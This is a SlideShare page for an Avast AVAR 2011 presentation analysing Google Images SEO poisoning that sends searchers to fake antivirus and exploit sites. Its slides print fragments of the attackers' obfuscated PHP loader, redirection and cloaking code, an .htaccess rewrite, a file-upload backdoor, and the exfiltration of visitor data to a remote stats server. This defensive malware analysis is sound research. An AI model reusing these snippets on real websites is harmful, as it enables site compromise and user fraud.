Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Analysis of Google ImagesPoisoningLukáš HamíkJan Širmer www.avast.com
Agenda• What is Google-images poisoning?• How it works• Doorway generator• Java script redirector• Evolution• ...
Google Images poisoning• SEO blackhat poisoning attack• Uses hacked sites to redirect users to sites containing fake AV o...
Google Images poisoning User How it works? Infected serverAVAR...
Google search resultsAVAR 2011 www.avast.com
Google Images poisoning User Infected server Fake AV ...
Fake antivirusesAVAR 2011 www.avast.com
Google Images poisoning User Infected server Fake AV ...
Why is it so successful?• Great SEO and nobody umed SEO for “imagem”AVAR 2011 www.avast.com
Why is it so successful? (2)• Computer users do not expect that they can get infected when searching for images on legiti...
Why is it so successful? (3)• Hide and Seek – if users are using Opera browser or they are coming from Google, Y...
Your website gets infected• The bad guys are using stolen FTP credentials• They upload PHP script to the WEB server• This ...
Additional malicious files• Xmlrpc.txt – Remote server address stored• -> Xml.txt -> Xml.cgi – address in Base64• Iog...
PHP script on infected sites• Earlier, they used names such as d{1,3}.php• Today, they use names like microphone.php, etc....
PHP scriptOriginal PHP file uploaded to server• <?eval (gzuncompress (base64_decode(eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8...
PHP scriptPHP file after first step of deobfuscation• $GLOBALS[_1600532410_]=Array(base64_dec ode(ZXJyb3Jfcm.Vwb3J0.aW5.n...
PHP script after removingobfuscationif (strpos($_SERVER[HTTP_USER_AGENT], Opera) !== false) {}if (strpos($_SERVER[HTTP_RE...
Doorway generator• HTML template is stored in the file .log/SITE/shab100500.txt• In the new version, shab100500.txt was r...
Doorway generator• Get descriptions of top 40 ‘mearch keywordm’ harmful action from Google web ...
Doorway generator• Get top 20 ‘mearch <img keyword’ from Google src="http://SITE/p Ima...
Doorway generator<img harmful action against aharmful actionsrc="http://SITE/p person or g...
Doorway generator<HTML>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt utlabore...
How do they make image URLsless suspicious?• "RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST...
PHP script evolution• The first version was focused on all users using Opera browser or users coming from Google, Y...
Data parametershttp://mydiarycom.net/out/stat.cgi?parameter=1. Name of the doorway site2. The full URL of doorway script3....
IP address and user-agents Fake AVAVAR 2011 www.avast.com
IP address and user-agents Spam pageAVAR 2011 www.avast.com
JavaScript redirectorvar URL = “SITE contains FakeAV” +encodeURIComponent(document.referrer) +"&parameter=$keyword&se=$s...
Redirection• Mac – http://IP/r/RANDOM_STRING IP and ‘r’ are change enery 30 minutem• Exploit site - http://SITE/index.ph...
Other changes• Rotating user-agent string• Password-protected maintenance request Someone who know how this algorithm wor...
Password-protected maintenancerequestif ($_GET[ dom100500 != { $_13 = fopen( .log/$_4. /xmlrpc.txt w+; fwrite($_13,$_G...
Data from theAVAST CommunityIQ• From March to August 2011, we discovered 22,580 unique infected sites• 5,698 sites are st...
Infected domainsAVAR 2011 www.avast.com
Number of infected domainsAVAR 2011 www.avast.com
Summary• Google-image poisoning is an easy way how to spread fake AV and exploits• It’m bamed on mtolen FTP credentialm o...
Questions and AnswersAVAR 2011 www.avast.com
Thank youJan Sirmer (sirmer@avast.com)Senior Virus AnalystLukas Hasik (hasik@avast.com)QA DirectorAVAR 2011 www.av...
Upcoming SlideShare
Loading in …5
×
Upcoming SlideShare
Gop 2012 nomination share of popular vote and delegates per candidate (03.14.12)
Next
Technology, News & Politics
Nov. 11, 2011
7,875 views

2

Share

Poisoning Google images

Technology, News & Politics
Nov. 11, 2011
7,875 views

There have long been links on the internet that take the unwary user to a page with unexpected or malicious content. Most of these attempts rely on the user to click on the link to be successful. However, the latest variation has moved beyond simple text links to "Google-image poisoning" - placing malware in the middle of Google searches for images where users have traditionally had no reason to be wary. Our presentation will focus on How malware writers are able to infect the average website; detailed analyses of the PHP script used to infect s ites and SEO techniques to get infected images at the top of search results.

Recommended

Related Books

Free with a 30 day trial from Scribd

See all
Pastels and Pedophiles: Inside the Mind of QAnon Mia Bloom
(2.5/5)
Free
The Constitution of Knowledge: A Defense of Truth Jonathan Rauch
(4/5)
Free
Joe Biden: The Life, the Run, and What Matters Now Evan Osnos
(2.5/5)
Free
So You Want to Start a Podcast: Finding Your Voice, Telling Your Story, and Building a Community That Will Listen Kristen Meinzer
(4/5)
Free
Bezonomics: How Amazon Is Changing Our Lives and What the World's Best Companies Are Learning from It Brian Dumaine
(4.5/5)
Free
No Filter: The Inside Story of Instagram Sarah Frier
(5/5)
Free
The Future Is Faster Than You Think: How Converging Technologies Are Transforming Business, Industries, and Our Lives Peter H. Diamandis
(5/5)
Free
Talk to Me: How Voice Computing Will Transform the Way We Live, Work, and Think James Vlahos
(3/5)
Free
From Gutenberg to Google: The History of Our Future Tom Wheeler
(2/5)
Free
SAM: One Robot, a Dozen Engineers, and the Race to Revolutionize the Way We Build Jonathan Waldman
(5/5)
Free
Live Work Work Work Die: A Journey into the Savage Heart of Silicon Valley Corey Pein
(4/5)
Free
Life After Google: The Fall of Big Data and the Rise of the Blockchain Economy George Gilder
(4/5)
Free
Autonomy: The Quest to Build the Driverless Car—And How It Will Reshape Our World Lawrence D. Burns
(5/5)
Free
Future Presence: How Virtual Reality Is Changing Human Connection, Intimacy, and the Limits of Ordinary Life Peter Rubin
(4/5)
Free
Everybody Lies: Big Data, New Data, and What the Internet Can Tell Us About Who We Really Are Seth Stephens-Davidowitz
(4/5)
Free
System Identification: Tutorials Presented at the 5th IFAC Symposium on Identification and System Parameter Estimation, F.R. Germany, September 1979 Elsevier Books Reference
(4/5)
Free

Related Audiobooks

Free with a 30 day trial from Scribd

See all
The Afghanistan Papers: A Secret History of the War Craig Whitlock
(4.5/5)
Free
Presumed Guilty: How the Supreme Court Empowered the Police and Subverted Civil Rights Erwin Chemerinsky
(0/5)
Free
An Ugly Truth: Inside Facebook’s Battle for Domination Sheera Frenkel
(4.5/5)
Free
The Trigger: Narratives of the American Shooter Daniel J. Patinkin
(5/5)
Free
Uncontrolled Spread: Why COVID-19 Crushed Us and How We Can Defeat the Next Pandemic Scott Gottlieb
(0/5)
Free
The Reckoning: Our Nation's Trauma and Finding a Way to Heal Mary L. Trump
(4.5/5)
Free
Dirty Work: Essential Jobs and the Hidden Toll of Inequality in America Eyal Press
(5/5)
Free
The Rise and Fall of Osama bin Laden Peter L. Bergen
(4.5/5)
Free
Saving Us: A Climate Scientist's Case for Hope and Healing in a Divided World Katharine Hayhoe
(5/5)
Free
The Kaepernick Effect: Taking a Knee, Changing the World Dave Zirin
(5/5)
Free
On the House: A Washington Memoir John Boehner
(4.5/5)
Free
Fucked at Birth: Recalibrating the American Dream for the 2020s Dale Maharidge
(4.5/5)
Free
Persist Elizabeth Warren
(4/5)
Free
Unsportsmanlike Conduct: College Football and the Politics of Rape Jessica Luther
(4.5/5)
Free
Nightmare Scenario: Inside the Trump Administration’s Response to the Pandemic That Changed History Yasmeen Abutaleb
(4.5/5)
Free
Last Best Hope: America in Crisis and Renewal George Packer
(4.5/5)
Free

Poisoning Google images

  1. 1. Analysis of Google ImagesPoisoningLukáš HamíkJan Širmer www.avast.com
  2. 2. Agenda• What is Google-images poisoning?• How it works• Doorway generator• Java script redirector• Evolution• Data from AVAST CommunityIQ userbase• Summary• QuestionsAVAR 2011 www.avast.com
  3. 3. Google Images poisoning• SEO blackhat poisoning attack• Uses hacked sites to redirect users to sites containing fake AV or exploit• Uses key-word rich pages with hot-linked images for higher indexing by search bots• Images from hacked sites are near the top search results• Focused on users coming from well-know search enginesAVAR 2011 www.avast.com
  4. 4. Google Images poisoning User How it works? Infected serverAVAR 2011 www.avast.com
  5. 5. Google search resultsAVAR 2011 www.avast.com
  6. 6. Google Images poisoning User Infected server Fake AV Remote serverAVAR 2011 www.avast.com
  7. 7. Fake antivirusesAVAR 2011 www.avast.com
  8. 8. Google Images poisoning User Infected server Fake AV Remote server Bad guyAVAR 2011 www.avast.com
  9. 9. Why is it so successful?• Great SEO and nobody umed SEO for “imagem”AVAR 2011 www.avast.com
  10. 10. Why is it so successful? (2)• Computer users do not expect that they can get infected when searching for images on legitimate sites Infected Fake AV serverAVAR 2011 www.avast.com
  11. 11. Why is it so successful? (3)• Hide and Seek – if users are using Opera browser or they are coming from Google, Yahoo or a Bing, they are served a Java script redirector Malicious contentAVAR 2011 www.avast.com
  12. 12. Your website gets infected• The bad guys are using stolen FTP credentials• They upload PHP script to the WEB server• This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to web server• Bonus feature - it lets the owners know that the page is readyAVAR 2011 www.avast.com
  13. 13. Additional malicious files• Xmlrpc.txt – Remote server address stored• -> Xml.txt -> Xml.cgi – address in Base64• Iog.txt – Redirecting java script stored• Shab100500.txt – Spam HTML template stored• -> Don.txt – HTML template in Base64AVAR 2011 www.avast.com
  14. 14. PHP script on infected sites• Earlier, they used names such as d{1,3}.php• Today, they use names like microphone.php, etc.• This script is responsible for: 1. Creating spam pages for Google bot indexing 2. Changing .htaccess 3. Serving redirect script to user to exploit sites 4. Serving redirect script to user to fake AV 5. Downloading malicious files to server 6. Telling owners that the site is readyAVAR 2011 www.avast.com
  15. 15. PHP scriptOriginal PHP file uploaded to server• <?eval (gzuncompress (base64_decode(eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=) ) ); ?>AVAR 2011 www.avast.com
  16. 16. PHP scriptPHP file after first step of deobfuscation• $GLOBALS[_1600532410_]=Array(base64_dec ode(ZXJyb3Jfcm.Vwb3J0.aW5.n• Function _1070120820($i) {$a=Array(c.Q=.=,cQ==,• ($GLOBALS[_1600532410_][16]( _1070120820(6))) {…AVAR 2011 www.avast.com
  17. 17. PHP script after removingobfuscationif (strpos($_SERVER[HTTP_USER_AGENT], Opera) !== false) {}if (strpos($_SERVER[HTTP_REFERER], google.) || strpos($_SERVER[HTTP_REFERER], yahoo.) || strpos($_SERVER[HTTP_REFERER], bing.) > 0) {$_10 = file_get_contents(.log/ . $_4 . /xmlrpc.txt);AVAR 2011 www.avast.com
  18. 18. Doorway generator• HTML template is stored in the file .log/SITE/shab100500.txt• In the new version, shab100500.txt was replaced by don.txt <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in <Replaceme> </Replaceme> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML> www.avast.com
  19. 19. Doorway generator• Get descriptions of top 40 ‘mearch keywordm’ harmful action from Google web against a person or group in response• Shuffle the words into revenge to a their descriptions to get grievance, be it real unique text or rick santorum perceived www.avast.com
  20. 20. Doorway generator• Get top 20 ‘mearch <img keyword’ from Google src="http://SITE/p Images and extract links ath/hot-linked- to image files image.jpg"• Generates <img> tags alt="search and shuffle them keywords" align="random(cent er, right, left)"> www.avast.com
  21. 21. Doorway generator<img harmful action against aharmful actionsrc="http://SITE/p person or group in against a person orath/hot-linked- response revenge to a group in responseimage.jpg" grievance<img revenge to aalt="search src="http://SITE/path/hot- grievance, be it realkeywords" linked-image.jpg" or rick santorumalign="random(cent alt="search keywords" perceiveder, right, left)"> align="random(center, right , left)"> www.avast.com
  22. 22. Doorway generator<HTML>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt utlabore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamcolaboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in<h1>SEARCH KEYWORD</h1>Suggested links<Replaceme>Links to 30 most recently generated links</Replaceme>Rich-word generated text with hot-linked imagesLinks to alternative pagesLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt utlabore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco</HTML> www.avast.com
  23. 23. How do they make image URLsless suspicious?• "RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ ".$_SERVER[ SCRIPT_NAME."?q=$1 [L] “• this changes URL from suspicioushttp://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywordsAVAR 2011 www.avast.com
  24. 24. PHP script evolution• The first version was focused on all users using Opera browser or users coming from Google, Yahoo or Bing• During June, we found some changes in PHP code - Google is the only target - New redirection system• Request goes to a remote server ( mydiarycom.net ) - centralized• They have statistic data from parameters• No need to update iog.txt (redirecting script) or make differentiating changes on each serverAVAR 2011 www.avast.com
  25. 25. Data parametershttp://mydiarycom.net/out/stat.cgi?parameter=1. Name of the doorway site2. The full URL of doorway script3. Vimitor’m IP4. The referring URL5. The User-Agent of the umer’m browmer6. The search query used on GoogleAVAR 2011 www.avast.com
  26. 26. IP address and user-agents Fake AVAVAR 2011 www.avast.com
  27. 27. IP address and user-agents Spam pageAVAR 2011 www.avast.com
  28. 28. JavaScript redirectorvar URL = “SITE contains FakeAV” +encodeURIComponent(document.referrer) +"&parameter=$keyword&se=$se&ur=1&HTTP_REF ERER=“ +encodeURIComponent(document.URL) +"&default_keyword=default";if (window!=top) {top.location.href = URL;}else document.location= URL;AVAR 2011 www.avast.com
  29. 29. Redirection• Mac – http://IP/r/RANDOM_STRING IP and ‘r’ are change enery 30 minutem• Exploit site - http://SITE/index.php?tp=RANDOM_STRING Site and ‘tp’ are change enery 30 minutem• Fake AV – http://SITE/fast-scan/AVAR 2011 www.avast.com
  30. 30. Other changes• Rotating user-agent string• Password-protected maintenance request Someone who know how this algorithm works can easily change it and redirect to his or her own site• Xml.txt was replaced by xml.cgi• Working with free blogs sitesAVAR 2011 www.avast.com
  31. 31. Password-protected maintenancerequestif ($_GET[ dom100500 != { $_13 = fopen( .log/$_4. /xmlrpc.txt w+; fwrite($_13,$_GET[ dom100500); fclose($_13);if ($_GET[ up100500 != { $_14 = $_14 = $_14 . basename( $_FILES[ uploaded[ name) ; $_15=round(0+0.5+0.5); if(move_uploaded_file($_FILES[ uploaded[ tmp_name, $_14))AVAR 2011 www.avast.com
  32. 32. Data from theAVAST CommunityIQ• From March to August 2011, we discovered 22,580 unique infected sites• 5,698 sites are still infected• Typo : <IMG HEIGTH=?1?WIDTHAVAR 2011 www.avast.com
  33. 33. Infected domainsAVAR 2011 www.avast.com
  34. 34. Number of infected domainsAVAR 2011 www.avast.com
  35. 35. Summary• Google-image poisoning is an easy way how to spread fake AV and exploits• It’m bamed on mtolen FTP credentialm of webmamterm and great backdoor algorithms• The number of infected legitimate domains is growing every day• Common sense is not sufficient protectionAVAR 2011 www.avast.com
  36. 36. Questions and AnswersAVAR 2011 www.avast.com
  37. 37. Thank youJan Sirmer (sirmer@avast.com)Senior Virus AnalystLukas Hasik (hasik@avast.com)QA DirectorAVAR 2011 www.avast.com

  • joesorrasak

    Jan. 16, 2012

  • Soulflare3

    Jan. 6, 2012

There have long been links on the internet that take the unwary user to a page with unexpected or malicious content. Most of these attempts rely on the user to click on the link to be successful. However, the latest variation has moved beyond simple text links to "Google-image poisoning" - placing malware in the middle of Google searches for images where users have traditionally had no reason to be wary. Our presentation will focus on How malware writers are able to infect the average website; detailed analyses of the PHP script used to infect s ites and SEO techniques to get infected images at the top of search results.

Views

Total views

7,875

On Slideshare

0

From embeds

0

Number of embeds

30

Actions

Downloads

0

Shares

0

Comments

0

Likes

2

×